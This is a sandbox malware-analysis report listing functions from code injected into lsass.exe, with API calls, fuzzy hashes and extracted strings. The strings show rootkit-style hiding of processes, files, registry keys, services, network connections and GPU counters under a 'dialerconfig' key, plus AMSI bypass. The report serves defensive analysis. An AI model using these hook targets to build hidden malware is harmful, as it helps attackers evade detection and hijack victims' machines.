                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117AA
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15117CA
                                                          • SleepEx.KERNELBASE ref: 000002D6F1511AE3
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117E5
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511805
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511820
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511840
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151185B
                                                            • Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151187B
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511896
                                                            • Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15118A0
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction ID: 44f190ebc50ea03d88713292795647823baa496bc22053f10ad1d2e118dfbcda
                                                          • Opcode Fuzzy Hash: 65153283aa6c96ced916157d2f86422634ff98b4549c9c2683df96b80b9c3d6c
                                                          • Instruction Fuzzy Hash: 9231D4E1610E059AFF529F36F5DD36922A5BB84BC0F0450679E0F97E95EE1CCC518350

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction ID: dcd933d318de9fc5b8a688a743a1f8572ccd52ea406db3ee166873abffebb1ac
                                                          • Opcode Fuzzy Hash: eeb4c9d13e4d9331326a316f022dbcf34e2f04a28c739e06152b1c27ab991b03
                                                          • Instruction Fuzzy Hash: 26B18EA2210E948AEB669F25F44D7A9A3A4F744BC4F64511BEE0E63F94DB3DCC81C740
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction ID: 7562c58f7faaf0b984c5202458afec4fdd28a687dc857cffa9d6136a4c55b39e
                                                          • Opcode Fuzzy Hash: 83b7811ed3dfc20f87799ca4d6a8862c7cd88f8e2de3ef0f3c1075f59fefca25
                                                          • Instruction Fuzzy Hash: EA311AB3205F808AEB619F61F8583ED7364F788788F44442ADA4E57A98DF3CCA48C710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction ID: 983a0a3fc5edacdfce01fe7f56abe7292d91a1dcaf254e42882d2e395cc53917
                                                          • Opcode Fuzzy Hash: 73b818fc325fecaacad8de34b866da11aee815d79a746152a1b7109c0a3c76cf
                                                          • Instruction Fuzzy Hash: E7313A76214F808AEB619F25F84839E73A4F789798F540126EA9E53B99DF3CC945CB00

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                          • API String ID: 2135414181-2879589442
                                                          • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction ID: 7dbd83f680d555f0e8a05f6407e5a9104c838bd5824e768260b09f9a20a43afb
                                                          • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                          • Instruction Fuzzy Hash: 7D7196A6710E918AEB119F76F89CA9923B4F784BC8F405112DE4E57F69EF2CC844C744

                                                          Control-flow Graph

                                                          APIs
                                                          • GetCurrentThread.KERNEL32 ref: 000002D6F1511D4B
                                                            • Part of subcall function 000002D6F15120C4: GetModuleHandleA.KERNEL32(?,?,?,000002D6F1511D7D), ref: 000002D6F15120DC
                                                            • Part of subcall function 000002D6F15120C4: GetProcAddress.KERNEL32(?,?,?,000002D6F1511D7D), ref: 000002D6F15120ED
                                                            • Part of subcall function 000002D6F1515F60: GetCurrentThreadId.KERNEL32 ref: 000002D6F1515F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 4175298099-4225371247
                                                          • Opcode ID: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction ID: 01390cbd5a7a922a2e2bff300826dd9bbb3a3ff9ce58a082e6952bfbcc40631a
                                                          • Opcode Fuzzy Hash: 89246b417a86cb3eef481aa141f8dfd28da3205d5bec25beb87351269da72666
                                                          • Instruction Fuzzy Hash: 5641A1E5100D8AA8EA06EFA4F85E6D42362F7403C4FA0451B951F239B5EE7CCE4EC761

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction ID: 63fde3cdae1c7709bce9cd44def21624c9ca46219b84b1ad8c47164ad88fefa6
                                                          • Opcode Fuzzy Hash: cc1628f5bdf40f209b9d07d80321b7de87e74088023d72a2e45934eb7399fe90
                                                          • Instruction Fuzzy Hash: 4A5105B2604B848AEB55CF62F44C35AA7A1F788FD9F144126DE4A17B58DF7CD849CB00
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                          • String ID: destructor'$ned$restrict(
                                                          • API String ID: 190073905-924718728
                                                          • Opcode ID: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction ID: 39b8463a6b1aefa4131af0ce40a811fa63a0ce5cb70bcc8134708b22748181b3
                                                          • Opcode Fuzzy Hash: c075132b8ffb7c8aa12930f0dbbf7461f30bd8bef12e3c9d76da9105ae1b8dff
                                                          • Instruction Fuzzy Hash: AA81C061600E418EFA60EB69F44D39966D0ABC57E0F444027AA1B47F9EEB3DCE468744

                                                          Control-flow Graph (function at 2d6f151d258; rendered graph with executed/not-executed block colouring not preserved in text)
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D267
                                                          • FlsGetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D27C
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D29D
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D2CA
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D2DB
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D2EC
                                                          • SetLastError.KERNEL32(?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D307
                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D33D
                                                          • FlsSetValue.KERNEL32(?,?,00000001,000002D6F151F0FC,?,?,?,?,000002D6F151C3CF,?,?,?,?,?,000002D6F1517EE0), ref: 000002D6F151D35C
                                                            • Part of subcall function 000002D6F151DAFC: HeapAlloc.KERNEL32(?,?,00000000,000002D6F151D432,?,?,?,000002D6F151DAE5,?,?,?,?,000002D6F151DBA8), ref: 000002D6F151DB51
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D384
                                                            • Part of subcall function 000002D6F151DB74: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002D6F151643A), ref: 000002D6F151DB8A
                                                            • Part of subcall function 000002D6F151DB74: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002D6F151643A), ref: 000002D6F151DB94
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D395
                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002D6F1520E9B,?,?,?,000002D6F152088C,?,?,?,000002D6F151CC7F), ref: 000002D6F151D3A6
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                          • String ID:
                                                          • API String ID: 570795689-0
                                                          • Opcode ID: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction ID: 59c76e7087845905331f5c9f2bf64267144371c9c505c38e9f152955b3b7a01b
                                                          • Opcode Fuzzy Hash: ed67185a8b28226d4ae9e946df9fda9d74e56255075e212544000e561ebf9f9b
                                                          • Instruction Fuzzy Hash: 96415EE5301E844EFA5AAF32759E76D62429B457F0F540B27A93F27ED6DE6CDC028200

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction ID: d2c53924e1538c41bb08355667a16be2805f83df9a9d61a4544346d1173b0a99
                                                          • Opcode Fuzzy Hash: 7a97016342490a0645e117d0aabf47d1727a4fd40327ed8f0cace4092c4eefd3
                                                          • Instruction Fuzzy Hash: 753193A2A00E808AFB61CF22B81C759B3E0F798BE5F5445269E4E53E65DF3CD8568740

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU user(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction ID: fec11db0822d307948e4a7c1ba74c8d5261461f253cb747260e5761ca3857917
                                                          • Opcode Fuzzy Hash: a4d014078471b981586e837c2868b443f3fcdd08967b9f8fe30d7546c34e5f89
                                                          • Instruction Fuzzy Hash: 4C3159A2610F818AF791DF26B85C759A3A1B794FD5F1441269E8F53B24EF3CD8468700
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000003.2213046710.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_3_2d6f14e0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction ID: f656ef8e49960a6b74665e79ce9ccd3527a8fb3a4c77477665914186e18d97d4
                                                          • Opcode Fuzzy Hash: 9cfecb073a77c82b5205d4ec5f6c3b841c922ed377687b22fe55079c845d3249
                                                          • Instruction Fuzzy Hash: A8E15B72604B408EEB60DF69E44C39D7BA0F795BD8F104516EE8A97F99CB38CA91C710

                                                          Control-flow Graph (function at 2d6f151a974; rendered graph with executed/not-executed block colouring not preserved in text)
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction ID: 8bd4ce2d5a4f6d73ed0f55f0107dccffaaa78187669bcc93e1a79a3ab942d4f8
                                                          • Opcode Fuzzy Hash: 97224decaf04aa8a96cad19aafa8d0fc2d444fbfe93f120d80d8953d06d5a995
                                                          • Instruction Fuzzy Hash: F8E14CB2604F808EEB229FA5E44839D77A4F745BD8F144517EE8E67B99CB38C991C700

                                                          Control-flow Graph (function at 2d6f151f7c4; rendered graph with executed/not-executed block colouring not preserved in text)
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeLibraryProc
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 3013587201-537541572
                                                          • Opcode ID: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction ID: 79254f32f3b6e32fc6b4e35625dee29fad6023e8c082d9260ff16057696211fb
                                                          • Opcode Fuzzy Hash: 00167ab4370d744fa0294c6334099228d3e91a4042df4aa134bc83b99d5d7789
                                                          • Instruction Fuzzy Hash: 0741A1A2311E50A9EB1BDF26B84C7556396BB45BE0F4841279D0F67B94EB3CCC498340
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction ID: ff6e951b7c38a8a75e43e205a700e730673afc4ee2af2b0ae6d412e1c43807d8
                                                          • Opcode Fuzzy Hash: 4fe3aae0cbb599a1eee1f2be40b2bdf186d2f5bad4b5f62f31428b11ea11a368
                                                          • Instruction Fuzzy Hash: 50414F73214F80CAEB51CF61E44879AB7A1F388B98F048116DA8A17B58DF3CD849CB00
                                                          APIs
                                                          • FlsGetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D4B7
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D4D6
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D4FE
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D50F
                                                          • FlsSetValue.KERNEL32(?,?,?,000002D6F151CC0E,?,?,?,?,?,?,?,?,000002D6F151D3CD,?,?,00000001), ref: 000002D6F151D520
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Value
                                                          • String ID: 1%$Y%
                                                          • API String ID: 3702945584-1395475152
                                                          • Opcode ID: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction ID: 34fff18819220c53d17335b28181365dbf6ab4e02b52f8033893f198ed7e02b2
                                                          • Opcode Fuzzy Hash: 414de4670033e7547a0a5b3bdda6d862915786416a62f5675f2ee32494ca94ec
                                                          • Instruction Fuzzy Hash: 451190E1305E404AFA5AAF32B58D7796242AB843F4F544327A83F27FD6DE6CCC028600
                                                          Memory Dump Source
                                                          • Source File: 00000040.00000002.3453280554.000002D6F1511000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                          • Associated: 00000040.00000002.3453244691.000002D6F1510000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453370965.000002D6F1526000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453456017.000002D6F1531000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453543098.000002D6F1533000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 00000040.00000002.3453606551.000002D6F1539000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_64_2_2d6f1510000_lsass.jbxd
                                                          Similarity
                                                          • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                          • String ID: \\.\pipe\dialerchildproc
                                                          • API String ID: 166002920-1933775637
                                                          • Opcode ID: 46ac6f3595cd08ba72cfe16ac14249d71bcf4bf6cdab2aa291378c72e2095538
